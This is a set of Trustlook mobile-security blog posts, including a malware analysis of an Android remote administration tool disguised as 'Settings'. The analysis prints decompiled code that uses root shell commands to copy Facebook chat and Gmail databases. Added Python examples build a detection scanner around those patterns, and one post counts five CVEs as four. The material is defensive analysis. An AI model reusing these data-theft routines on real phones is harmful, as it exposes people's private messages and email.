Trustlook Sentinel Whitepaper Now Available!

Are you interested in learning more about one of the most groundbreaking technologies in mobile security?

Trustlook Sentinel is the first ever 100% behavior-based malware detection engine built into the operating system of a mobile device. It provides real-time zero-day detection of malware. Download the whitepaper here and discover why Sentinel is considered a game changer in security.

Trustlook Mobile Security Releases Instant Protection Feature

Trustlook has released a new feature in its Trustlook Mobile Security app that proactively notifies users of any new malware on their device. Instead of a user needing to re-scan their device in order to find malware, Trustlook will send a message to users if it discovers malware that was previously unknown.

For example:

  1. Jack installs a new app
  2. The Trustlook Mobile Security protection is triggered, and the app is uploaded to Trustlook’s cloud. In a small number of cases Trustlook’s system has no prior knowledge of the app, so we consider it benign.
  3. A few days later, Trustlook’s Core Security system detects this new app as malware
  4. Trustlook Operations launches “Instant Protection” to notify Jack of this malware and to uninstall the app.

In a perfect world, mobile devices would be 100% protected from security risks because security vendors would be aware of every malicious application that exists. However, that is not reality. It’s not possible to have full, 100% coverage. To mitigate this risk, Trustlook now offers Instant Protection.
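The four-step flow above, modelled as a small reconciliation routine. This is an added example and not Trustlook's code: a device records each installed package together with the cloud verdict it was given at install time, and a later pass finds every device still carrying a package whose verdict has since flipped to malicious. Device ids, the benign package and its hash are constructed; the one real hash is the SHA256 this page lists for Android.Trojan.Pathcall further down.

```python
"""Retroactive verdict reconciliation (added illustration, not Trustlook code).

Step 1-2: on_install() uploads the hash and stores whatever the cloud knows,
          which for a never-seen package is "unknown" (treated as benign).
Step 3:   the backend later sets that hash to "malicious".
Step 4:   reconcile() finds the affected devices and queues a
          notify-and-uninstall action, without the user re-scanning.
"""
from dataclasses import dataclass, field

UNKNOWN, BENIGN, MALICIOUS = "unknown", "benign", "malicious"


@dataclass
class Device:
    device_id: str
    # sha256 -> (package name, verdict the device was last told)
    installed: dict = field(default_factory=dict)


class VerdictStore:
    """Cloud-side knowledge: sha256 -> verdict. Absent hashes are unknown."""

    def __init__(self):
        self._verdicts = {}

    def lookup(self, sha256):
        return self._verdicts.get(sha256, UNKNOWN)

    def set(self, sha256, verdict):
        self._verdicts[sha256] = verdict


def on_install(device, store, sha256, package):
    """Record the app with the verdict known at install time and return it."""
    verdict = store.lookup(sha256)
    device.installed[sha256] = (package, verdict)
    return verdict


def reconcile(devices, store):
    """Return one action per (device, package) whose verdict flipped to malicious."""
    actions = []
    for dev in devices:
        for sha256, (package, last_told) in dev.installed.items():
            current = store.lookup(sha256)
            if current == MALICIOUS and last_told != MALICIOUS:
                actions.append({"device": dev.device_id, "package": package,
                                "sha256": sha256, "action": "notify_and_uninstall"})
                # remember that this device was told, so the next run stays quiet
                dev.installed[sha256] = (package, current)
    return actions


# SHA256 listed on this page for Android.Trojan.Pathcall (com.path.call)
PATHCALL_SHA256 = "6f86bb869c865910c44a2b033c547a7a8b220ae3c48cd5948e74b32df286dbbc"


def run_scenario():
    """Replay the post's Jack example; returns the actions of three successive runs."""
    store = VerdictStore()
    jack = Device("jack-phone")   # constructed device id
    jill = Device("jill-phone")   # constructed; never installs the bad app
    on_install(jack, store, PATHCALL_SHA256, "com.path.call")   # unknown at the time
    on_install(jill, store, "a" * 64, "com.example.notes")      # constructed benign hash
    store.set("a" * 64, BENIGN)
    first = reconcile([jack, jill], store)       # nothing has flipped yet
    store.set(PATHCALL_SHA256, MALICIOUS)        # days later: Core Security verdict
    second = reconcile([jack, jill], store)      # Jack gets notified
    third = reconcile([jack, jill], store)       # already notified, nothing new
    return first, second, third


if __name__ == "__main__":
    for run in run_scenario():
        print(run)
```

The store only needs the verdict that each device was last told, so the same pass also handles a benign-to-malicious flip and never re-notifies a device that has already been told.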

Oops! BadKernel Now Affects 100 Million, Not 30 Million

We reported last week that BadKernel, a flaw in the Google Chromium mobile browser framework that spreads as users click on malicious links, affects 30 million Android users. However, from our internal reporting over the past few days, it’s clear that the actual number is much higher. Our new estimate is that BadKernel now impacts 100 million Android users. This is about 7% of the total Android user base.

Trustlook has released a new feature in its Trustlook Mobile Security app that detects BadKernel. You are encouraged to scan your phone today and see if you are impacted.

Trustlook Releases BadKernel Vulnerability Detector

An Updated Version (Version 3.5.10) of the Trustlook Mobile Security App Identifies the BadKernel Issue Affecting 30 Million Android Users

Trustlook has released a new feature in its Trustlook Mobile Security app that detects BadKernel, the widespread vulnerability affecting millions of Android devices.

First discovered in August 2016, BadKernel is a flaw in the Google Chromium mobile browser framework that spreads as users click on malicious links. Users of older versions of Chromium-powered mobile browsers, as well as applications with embedded Webview (such as the massively popular WeChat app) may be vulnerable. If infected, a user’s contacts and text messages could be exposed, as well as any payment passwords.

To determine if your device is vulnerable to this threat, open the Trustlook Mobile Security app, navigate to the BadKernel Vulnerability detector on the main screen, and click “Check it Now.” If you are exposed, you can update your browser software.

[screenshots: the BadKernel Vulnerability detector in the Trustlook Mobile Security app]
The BadKernel vulnerability impacts an estimated 30 million Android smartphones and tablets. The flaw involves a bug in the source code of Google’s V8 JavaScript Engine, which is a component of the open-source Chromium. An attacker can exploit this flaw to cause key object information leakage.

Since many phones are not using the most current browser software, this zero-day attack could be used widely. Trustlook encourages users to run a quick scan of their phone and update their browser if they are affected. In addition, Trustlook suggests users not click on random links or links that appear suspicious. They also stress that users should keep their apps and OS updated, and continually monitor their device for any potential issues.

To check if your Android device is affected by the BadKernel vulnerability, please download the Trustlook Mobile Security app.

Black Hat 2016 Recap and 5 Key Takeaways

Trustlook was thrilled to be part of Black Hat 2016 at Mandalay Bay in Las Vegas. We had a booth in Innovation City, and had the chance to meet many great people in the security industry as well as learn a lot of great new things about cyber security. We successfully launched two new products: Trustlook Sentinel and SkyEye. We were also excited to be interviewed by the Security Guy Radio show and Decrypted Tech. Here are our top 5 takeaways from Black Hat 2016.

1. People Think Mobile is Safe
It was surprising to hear feedback from some industry experts who feel that security issues on mobile devices are “not that big of a deal.” In fact, there were only a handful of mobile security companies at the show. That thinking, unfortunately, is completely wrong. Mobile device usage is growing faster each and every day, and BYOD is becoming the norm across much of the corporate world. Further, the complex technology stack and OS fragmentation of Android devices complicate matters and increase the fragility of this endpoint. Needless to say, mobile will continue to be a preferred exploitation point for hackers.

2. Partnerships in Security are the Name of the Game
With many companies focusing on different areas of security (such as network, app, cloud, data, mobile, etc.) it’s only natural for these companies to want to work together to develop custom solutions for organizations. We were approached by many companies wanting to leverage our mobile security expertise. CISOs are looking for solutions that solve their problems, not disparate solutions that result in more headaches. Cross-vendor product integrations will continue to grow to meet the complex and unique needs of organizations.

3. Ransomware is Top of Mind
It’s clear the rise of deceptive ransomware is top of mind with customers, vendors, and researchers alike. We went to a great ransomware session hosted by security firm CyberArk. They shared examples of ransomware including geo-targeted attacks, as well as information on how ransomware authors use customized local content while focusing their efforts on richer countries that can afford to pay the ransom.

4. Machine Learning, Machine Learning, Machine Learning
If I had a nickel for every time I heard “Machine Learning” at Black Hat… Machine Learning, the technology, has been around for a while in many aspects of life, and increasingly in security, as threat detection by way of signatures is being replaced by behavioral methods and machine learning. But Machine Learning, the buzzy catchphrase, is still relatively new, and shows no signs of losing its coolness. The good news for Trustlook is that we fit nicely into any Machine Learning conversation. Our new product Sentinel, the first ever 100% ROM-level malware detection engine, is built upon machine learning in that it improves (i.e. learns) with each behavior it sees in an app.

5. iOS Security is an Issue
We were amazed by the number of people who approached us looking for an iOS security solution. (We are currently developing one.) One person, in particular, develops custom security products for executives of large Fortune 500 companies. Most of these executives use an iPhone or other iOS device. He has seen first-hand these devices compromised and understands the potential problems when this happens. He wants to build additional security protections into the platform.

Were you at Black Hat 2016? Do you have any thoughts on the show? Let us know in the comments.

Trustlook Discovers a Remote Administration Tool (RAT) Android Malware

High Risk Malware by Onespy collects data from popular apps

The malicious app was detected by Trustlook as “Android.Trojan.Pathcall”, with a severity rating of 8/10 (High Risk). It disguises itself as a “System Settings” app to avoid being removed. The app starts as a service and is invisible to the user.

The package can be identified as having the following characteristics:

  • MD5: 28de4b4d2e964ad25403e9c2133b2939
  • SHA256: 6f86bb869c865910c44a2b033c547a7a8b220ae3c48cd5948e74b32df286dbbc
  • Size: 184036 bytes
  • App name: Settings
  • Package name: com.path.call

The package icon is:

[image: package icon]

Upon execution, the app persuades the user to grant device administrator access in order to maintain persistence on the system:

[screenshot: device administrator activation prompt]


The app runs itself as a service in the background:

[screenshot: the app’s background service]


In the screenshot below, the second “Settings” entry is actually the cleverly disguised Remote Administration Tool (RAT) app:

[screenshot: installed app list showing two “Settings” entries]


The app is developed by “www.onespy.in” and signed with the following certificate:

[screenshot: signing certificate details]


The app is apparently signed with the Android debug certificate. The website claims the app is “undeletable” even after a factory data reset. However, it can be removed if the user knows how to terminate the service.

The website provides a remote access panel. Depending on the package chosen, the registered user can perform different functions and retrieve data from many popular apps, including:

  • Call Logs
  • Call Recordings
  • Applications
  • Contacts
  • SMS Messages
  • Photos
  • Surroundings
  • GPS Locations
  • Facebook Chat
  • Hike Chat
  • IMO Chat
  • Line Chat
  • Skype Call Logs
  • Skype Chat
  • Viber Call Logs
  • Viber Chat
  • WhatsApp Call Logs
  • WhatsApp Chat
  • Gmail Emails
  • Outlook Emails
  • Yahoo Emails
  • Photo Capture
  • Screenshots


In addition to the above data, the app contains code to retrieve data from Twitter, Facebook, and Gmail. For example, the following decompiled snippets are used to retrieve Facebook chat data:

public class FBDBSender
{
  // Copies a file as root via "su -c cp <src> <dst>"; true when the shell exits with 0
  private static boolean copyDB(String paramString1, String paramString2)
  {
    try
    {
      L.l("fb copy:" + paramString1 + ";" + paramString2);
      paramString1 = "cp " + paramString1 + " " + paramString2;
      int i = Runtime.getRuntime().exec(new String[] { "su", "-c", paramString1 }).waitFor();
      return i == 0;
    }
    catch (Exception paramString1)
    {
      L.l(paramString1);
    }
    return false;
  }

  // Pulls the "name" field out of a JSON-encoded sender record
  private static String getName(String paramString)
  {
    try
    {
      paramString = new JSONObject(paramString).getString("name");
      return paramString;
    }
    catch (Exception paramString) {}
    return "";
  }

[…]

  // Copies Facebook's private threads database to external storage as fbdb2.db,
  // opens the copy read-only and reads sender, text and timestamp of every message
  private static void sendThreadsTable(Context paramContext)
  {
    Object localObject = null;   // locals left undeclared by the decompiler
    String str;
    SQLiteDatabase localSQLiteDatabase;
    Cursor localCursor;
    if (Environment.getExternalStorageState().equals("mounted")) {
      localObject = Environment.getExternalStorageDirectory().getAbsolutePath();
    }
    for (;;)
    {
      str = localObject + "/fbdb2.db";
      if (Environment.getExternalStorageState().equals("mounted"))
      {
        localObject = Environment.getExternalStorageDirectory().getAbsolutePath();
        localObject = localObject + "/fb_chat.csv";
      }
      for (;;)
      {
        try
        {
          if (copyDB("/data/data/com.facebook.katana/databases/threads_db2", str))
          {
            L.l("fbdb copied");
            localSQLiteDatabase = SQLiteDatabase.openDatabase(str, null, 1);
            localCursor = localSQLiteDatabase.rawQuery("SELECT sender, text, timestamp_ms FROM messages", null);
    […]


The following decompiled snippets are used to get Gmail data:

public class GMailAppDBReader
{
  private static final String dbnamePrefix = "gmldbcp_";

  // Locates every Gmail mailstore database as root with "find", then copies each
  // one to external storage (or the app's own files directory) through an
  // interactive "su" shell; returns the account names that were found
  private static String[] copyDB(Context paramContext)
  {
    Object localObject3;
    int i;
    int j;
    OutputStream localOutputStream;
    try
    {
      localObject1 = Runtime.getRuntime().exec(new String[] { "su", "-c", "find / -name mailstore*@gmail.com.db" }).getInputStream();
      Object localObject2 = new byte[660];
      localObject3 = new StringBuffer();
      for (;;)
      {
        i = ((InputStream)localObject1).read((byte[])localObject2);
        if (i == -1)
        {
          // one database path per line of the find output
          localObject2 = ((StringBuffer)localObject3).toString().split("\n");
          localObject3 = new String[localObject2.length];
          j = 0;
          Process localProcess = Runtime.getRuntime().exec("su");
          localOutputStream = localProcess.getOutputStream();
          int k = localObject2.length;
          i = 0;
          if (i < k) {
            break;
          }
         […]
    // account name: the text between the last '/' and the '@' of the database path
    String str = ((String)localObject1).substring(((String)localObject1).lastIndexOf('/') + 1, ((String)localObject1).lastIndexOf('@'));
    StringBuilder localStringBuilder = new StringBuilder("cp ").append((String)localObject1).append(" ");
    if (Environment.getExternalStorageState().equals("mounted")) {}
    for (Object localObject1 = Environment.getExternalStorageDirectory().getAbsolutePath();; localObject1 = paramContext.getFilesDir().getAbsolutePath())
    {
      // destination "<dir>/gmldbcp_<account>.db", newline-terminated, fed to the root shell's stdin
      localOutputStream.write(((String)localObject1 + "/" + "gmldbcp_" + str + ".db\n").getBytes());
      localObject3[j] = str;
      j += 1;
      i += 1;
      break;
    }
  }
      […]


One special feature that the app provides is the ability to run a remote command shell, which gives the controller access to the Linux system on an Android device:

public class ExecShell {
    // Decompiled enum of shell commands; the only member present runs
    // "/system/xbin/which su" to check whether a su binary is installed
    public enum SHELL_CMD {
        public static final enum SHELL_CMD check_su_binary;
        private static final SHELL_CMD[] ENUM$VALUES;   // synthetic values array (decompiler output)
        private final String[] command;                 // argv executed for this command

        static {
            SHELL_CMD.check_su_binary = new SHELL_CMD("check_su_binary", 0, new String[]{"/system/xbin/which",
                    "su"});
            SHELL_CMD.ENUM$VALUES = new SHELL_CMD[]{SHELL_CMD.check_su_binary};
        }

        private SHELL_CMD(String arg1, int arg2, String[] command) {
            super(arg1, arg2);
            this.command = command;
        }

        public static SHELL_CMD valueOf(String arg1) {
            return Enum.valueOf(SHELL_CMD.class, arg1);
        }

        public static SHELL_CMD[] values() {
            SHELL_CMD[] v0 = SHELL_CMD.ENUM$VALUES;
            int v1 = v0.length;
            SHELL_CMD[] v2 = new SHELL_CMD[v1];
            System.arraycopy(v0, 0, v2, 0, v1);
            return v2;
        }
    }
    // remainder of ExecShell (the command execution itself) is not shown in the post
}
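The traits described in this analysis (root shell via `su -c`, copying another app's private SQLite database out of /data/data, staging copies on external storage, enumerating Gmail mailstores with `find`, probing for the su binary, and the Android debug signing certificate) can be turned into a simple static indicator scan over decompiled source. The following is an added example and not Trustlook's detection engine: the sample source text is constructed from the snippets quoted above, the IoC hashes are the ones listed in this post, the signer subject is the stock Android SDK debug keystore DN, and the weights and thresholds are illustrative.

```python
"""Static indicator scan for decompiled Android source (added illustration).

scan_source() counts regex hits for each indicator in decompiled Java text,
risk_score() turns presence of indicators plus the signing certificate into a
score, and match_iocs() compares file hashes with the IoCs from the post.
"""
import re

# IoC hashes exactly as listed in the post for Android.Trojan.Pathcall
KNOWN_BAD_MD5 = {"28de4b4d2e964ad25403e9c2133b2939"}
KNOWN_BAD_SHA256 = {"6f86bb869c865910c44a2b033c547a7a8b220ae3c48cd5948e74b32df286dbbc"}

# (indicator name, regex over decompiled source, illustrative weight)
INDICATORS = [
    ("root_shell_exec", re.compile(r'exec\(\s*new String\[\]\s*\{\s*"su"\s*,\s*"-c"'), 2),
    ("su_interactive", re.compile(r'exec\(\s*"su"\s*\)'), 1),
    ("find_mailstore", re.compile(r'find / -name mailstore'), 1),
    ("external_staging", re.compile(r'getExternalStorageDirectory\(\)'), 1),
    ("su_probe", re.compile(r'/system/xbin/which"\s*,\s*"su"'), 1),
]
FOREIGN_DATA_WEIGHT = 3   # path strings under /data/data/<some other package>/
DEBUG_CERT_WEIGHT = 1     # signed with the SDK debug key, never a release signer
DEBUG_CERT_SUBJECT = re.compile(r"CN=Android Debug", re.IGNORECASE)
HIGH_RISK_THRESHOLD = 8


def scan_source(source: str, own_package: str) -> dict:
    """Return {indicator: hit_count} for every indicator present in `source`."""
    findings = {}
    for name, pattern, _weight in INDICATORS:
        hits = len(pattern.findall(source))
        if hits:
            findings[name] = hits
    # Another app's private directory is only readable with root; its presence
    # in path strings is the strongest single sign of cross-app data theft.
    foreign = {m.group(1) for m in re.finditer(r"/data/data/([\w.]+)/", source)
               if m.group(1) != own_package}
    if foreign:
        findings["foreign_app_data"] = len(foreign)
    return findings


def risk_score(findings: dict, signer_subject: str) -> int:
    """Presence-weighted score: each indicator counts once regardless of hit count."""
    weights = {name: w for name, _pattern, w in INDICATORS}
    weights["foreign_app_data"] = FOREIGN_DATA_WEIGHT
    score = sum(weights[name] for name in findings)
    if DEBUG_CERT_SUBJECT.search(signer_subject):
        score += DEBUG_CERT_WEIGHT
    return score


def classify(score: int) -> str:
    if score >= HIGH_RISK_THRESHOLD:
        return "high"
    return "medium" if score >= 4 else "low"


def match_iocs(md5: str = "", sha256: str = "") -> bool:
    """True when either hash is one of the IoCs listed in the post."""
    return md5.lower() in KNOWN_BAD_MD5 or sha256.lower() in KNOWN_BAD_SHA256


# Constructed sample: lines taken from the decompiled snippets quoted in the post
SAMPLE_SOURCE = r'''
paramString1 = "cp " + paramString1 + " " + paramString2;
int i = Runtime.getRuntime().exec(new String[] { "su", "-c", paramString1 }).waitFor();
if (copyDB("/data/data/com.facebook.katana/databases/threads_db2", str))
localObject1 = Runtime.getRuntime().exec(new String[] { "su", "-c", "find / -name mailstore*@gmail.com.db" }).getInputStream();
Process localProcess = Runtime.getRuntime().exec("su");
localObject = Environment.getExternalStorageDirectory().getAbsolutePath();
SHELL_CMD.check_su_binary = new SHELL_CMD("check_su_binary", 0, new String[]{"/system/xbin/which", "su"});
'''
# Subject of the stock Android SDK debug keystore (a known default, not taken from the post)
SAMPLE_SIGNER = "CN=Android Debug, O=Android, C=US"


def analyse(source=SAMPLE_SOURCE, own_package="com.path.call", signer=SAMPLE_SIGNER):
    """Scan, score and classify one package; returns a summary dict."""
    findings = scan_source(source, own_package)
    score = risk_score(findings, signer)
    return {"findings": findings, "score": score, "verdict": classify(score)}


if __name__ == "__main__":
    print(analyse())
    print("IoC match:", match_iocs(md5="28de4b4d2e964ad25403e9c2133b2939"))
```

Hash matching only catches this exact build, while the source indicators survive repackaging, which is why the score is driven by the behaviours rather than by the IoCs.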


Summary
The Remote Administration Tool by Onespy is very dangerous malware targeting Android devices. It exhibits backdoor functionality as well as the ability to collect data. The app can be used as a monitoring tool, as well as misused as a powerful remote control tool by criminals and malicious hackers.

Trustlook adds GPU detection to popular QuadRooter scanner app

Trustlook has again updated its popular Qualcomm QuadRooter Scanner App with version 1.2.3. QuadRooter is a set of four vulnerabilities (CVE-2016-2059, CVE-2016-2503, CVE-2016-2504, CVE-2016-5340, CVE-2016-2060) affecting an estimated 900 million Android smartphones and tablets built using Qualcomm chipsets. The key updates to the app are as follows:

Version 1.2.3:
– In addition to CPU (Central Processing Unit) detection, we’ve added GPU (Graphics Processing Unit) detection, since many QuadRooter issues are triggered through Qualcomm’s GPU driver
– Interface tuneups

Please visit the Google Play store to update to the latest version of the QuadRooter detection app.